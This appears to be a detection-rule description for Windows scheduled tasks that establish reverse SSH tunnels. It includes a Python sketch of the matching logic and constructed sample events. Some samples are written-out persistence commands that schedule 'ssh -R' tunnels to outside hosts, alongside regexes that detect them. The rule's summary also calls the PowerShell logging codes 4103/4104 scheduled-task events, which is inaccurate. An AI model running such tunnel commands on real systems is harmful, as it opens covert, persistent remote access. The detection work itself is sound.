
Summary
This detection rule targets the creation of scheduled tasks that may indicate the establishment of reverse SSH tunnels by threat actors on Windows systems. Such activity is a persistence technique commonly used by adversaries to maintain access after compromise. The detection logic keys on the event codes associated with scheduled tasks (EventCode 4103 and EventCode 4104) and uses regular-expression pattern matching to identify commands indicative of SSH tunneling. Noteworthy patterns include parameters typically found in SSH commands, such as ports and IP addresses. The filtering criteria are designed to match known indicators of potential abuse involving Living Off the Land (LOL) tactics, specifically those that leverage commonly available binaries and scripts for these operations. The rule aggregates timestamps, hosts, users, processes and parent processes to support investigation of any detected instance, so that security teams can respond effectively to potential threats.
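As an added illustration (not the rule's own search logic), the following Python reproduces the same flow over constructed script-block events: gate on the event code, require both a scheduled-task creation and an ssh forward with a port and user@host target, then aggregate per host and user. The regular expressions, field names and sample events are assumptions made for this example.

```python
import re
from collections import defaultdict

# Event codes named by the rule (PowerShell script block / module logging).
TUNNEL_EVENT_CODES = {"4103", "4104"}
# Scheduled-task creation context: schtasks.exe /create or the PowerShell cmdlet.
SCHED_TASK_RE = re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.IGNORECASE)

# ssh with a reverse (-R), local (-L) or dynamic (-D) forward, a port[:host:port] spec and a
# user@host target (IP or hostname). The flag stays case-sensitive so "-l <login>" is not matched.
# Hypothetical pattern written for this example, not the rule's own regex.
SSH_TUNNEL_RE = re.compile(
    r"\b(?i:ssh(?:\.exe)?)\b.*?[\s'\"]-([RLD])\s*\d{1,5}(?::[\w.\-]+:\d{1,5})?"
    r".*?\b\w+@([\w.\-]+)"
)

def is_ssh_tunnel_task(script_text):
    """True when one script block both creates a scheduled task and wires in an ssh forward."""
    return bool(SCHED_TASK_RE.search(script_text) and SSH_TUNNEL_RE.search(script_text))

def detect_ssh_tunnel_tasks(events):
    """Filter on event code and pattern, then aggregate per (host, user) as the rule does."""
    findings = defaultdict(lambda: {"firstTime": None, "lastTime": None, "count": 0,
                                    "processes": set(), "parent_processes": set()})
    for ev in events:
        if str(ev.get("EventCode")) not in TUNNEL_EVENT_CODES:
            continue  # out-of-scope event source
        if not is_ssh_tunnel_task(ev.get("ScriptBlockText", "")):
            continue  # benign task, or ssh outside a task definition
        f = findings[(ev["host"], ev["user"])]
        ts = ev["_time"]  # ISO 8601 strings sort lexically
        f["firstTime"] = ts if f["firstTime"] is None else min(f["firstTime"], ts)
        f["lastTime"] = ts if f["lastTime"] is None else max(f["lastTime"], ts)
        f["count"] += 1
        f["processes"].add(ev["process"])
        f["parent_processes"].add(ev["parent_process"])
    return dict(findings)

# Constructed sample events; hosts, users and addresses are made up for this example.
def _ev(t, code, host, user, parent, script):
    return {"_time": t, "EventCode": code, "host": host, "user": user,
            "process": "powershell.exe", "parent_process": parent, "ScriptBlockText": script}
SAMPLE_EVENTS = [
    _ev("2024-02-09T10:00:00Z", 4104, "WS01", "CORP\\alice", "explorer.exe", 'schtasks /create /tn Updater /sc onlogon /tr "ssh.exe -N -R 2222:localhost:3389 ops@203.0.113.10"'),
    _ev("2024-02-09T10:05:00Z", 4104, "WS01", "CORP\\alice", "cmd.exe", "Register-ScheduledTask -TaskName Sync -Action (New-ScheduledTaskAction -Execute ssh -Argument '-R 8080:127.0.0.1:80 svc@relay.example.net')"),
    _ev("2024-02-09T10:07:00Z", 4104, "WS02", "CORP\\bob", "explorer.exe", 'schtasks /create /tn Backup /sc daily /tr "robocopy C:\\data D:\\bak"'),  # task, no ssh
    _ev("2024-02-09T10:09:00Z", 4104, "WS03", "CORP\\carol", "WindowsTerminal.exe", "ssh -L 5432:db.internal:5432 carol@bastion.example.net"),  # ssh, no task
    _ev("2024-02-09T10:10:00Z", 4688, "WS01", "CORP\\alice", "explorer.exe", 'schtasks /create /tn X /tr "ssh -R 2222:localhost:22 a@198.51.100.5"'),  # wrong event code
]
```

Only the two WS01 events survive all three gates and collapse into a single finding with first/last time and both parent processes, which is the shape an analyst would triage.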
Categories
- Windows
- Endpoint
Data Sources
- Scheduled Job
- Process
ATT&CK Techniques
- T1053
- T1572
Created: 2024-02-09